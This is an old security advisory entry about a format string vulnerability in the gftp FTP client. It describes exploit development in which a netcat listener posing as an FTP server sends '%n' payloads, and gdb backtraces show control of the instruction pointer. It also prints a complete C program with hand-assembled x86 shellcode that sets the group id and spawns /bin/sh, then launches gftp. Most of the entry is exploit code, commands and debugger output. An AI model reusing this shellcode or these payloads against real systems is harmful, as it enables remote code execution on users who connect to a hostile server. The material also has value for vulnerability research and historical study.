COMMAND

    gftpd

SYSTEMS AFFECTED

    gftpd

PROBLEM

    Here are  some of  the other  ways of  playing with  gftp that the
    SRTeam of snosoft.com have been playing with.

    Here are some ideas... data can u help out...

        (root)>./execve
        shellcode addy: 0xbffff848
        crtl C

        (root)>echo -e "\x48\xf8\xff\xbf"
        Høÿ¿

        %n writes data to current frame see example...
        (root)>echo -e "AAAA%n" > file

        (root)>nc -l -p 21 < file
        Program received signal SIGSEGV, Segmentation fault.
        0x40325dd7 in vfprintf () from /lib/libc.so.6
        (gdb) bt
        #0  0x40325dd7 in vfprintf () from /lib/libc.so.6
        #1  0x40332bbc in vsprintf () from /lib/libc.so.6
        #2  0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
        #3  0x8111248 in ?? ()
        Cannot access memory at address 0x41414141

    Sooooooooo knowing that  we control the  eip lets try  to point it
    at some shellcode.

        (root)>echo -e "\x48\xf8\xff\xbf%n" > file

        (root)>nc -l -p 21 < file

        (gdb) run ftp://localhost
        The program being debugged has been started already.
        Start it from the beginning? (y or n) y
        Starting program: /usr/bin/gftp ftp://localhost
        warning: Unable to find dynamic linker breakpoint function.
        Program received signal SIG32, Real-time event 32.
        0x4030617e in sigsuspend () from /lib/libc.so.6
        (gdb) c
        Continuing.

        Program received signal SIGSEGV, Segmentation fault.
        0x40325dd7 in vfprintf () from /lib/libc.so.6
        (gdb) bt
        #0  0x40325dd7 in vfprintf () from /lib/libc.so.6
        #1  0x40332bbc in vsprintf () from /lib/libc.so.6
        #2  0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
        #3  0x403c8010 in __morecore () from /lib/libc.so.6
        #4  0x80beaf8 in ?? ()
        #5  0xbffffa31 in ?? ()
        #6  0x6e69622f in ?? ()
        Cannot access memory at address 0x7273752f
        (gdb) Quit

    This is definately not the proper approach to this...

    (root)>cat >
    execve.c
    main()
    {
    char hell[] =
    /* main: */                            /* setregid(12, 12);        */
    "\x29\xc0"                             /* subl %eax, %eax          */
    "\xb0\x47"                             /* movb $71, %al            */
    "\x29\xdb"                             /* subl %ebx, %ebx          */
    "\xb3\x0c"                             /* movb $12, %bl            */
    "\x89\xd9"                             /* movl %ebx, %ecx          */
    "\xcd\x80"                             /* int $0x80                */
    "\xeb\x18"                             /* jmp callz                */
    "\x5e"                                 /* popl %esi                */
    "\x29\xc0"                             /* subl %eax, %eax          */
    "\x88\x46\x07"                         /* movb %al, 0x07(%esi)     */
    "\x89\x46\x0c"                         /* movl %eax, 0x0c(%esi)    */
    "\x89\x76\x08"                         /* movl %esi, 0x08(%esi)    */
    "\xb0\x0b"                             /* movb $0x0b, %al          */
    "\x87\xf3"                             /* xchgl %esi, %ebx         */
    "\x8d\x4b\x08"                         /* leal 0x08(%ebx), %ecx    */
    "\x8d\x53\x0c"                         /* leal 0x0c(%ebx), %edx    */
    "\xcd\x80"                             /* int $0x80                */
    "\xe8\xe3\xff\xff\xff"                 /* call start               */
    "\x2f\x62\x69\x6e\x2f\x73\x68";


    printf("shellcode addy: 0x%x\n", hell);

    execl("/usr/bin/gftp", "gftp", "ftp://localhost", 0);
    exit(0);
    }

SOLUTION

    See:

        http://oliver.efri.hr/~crv/security/bugs/Others/gftpd2.html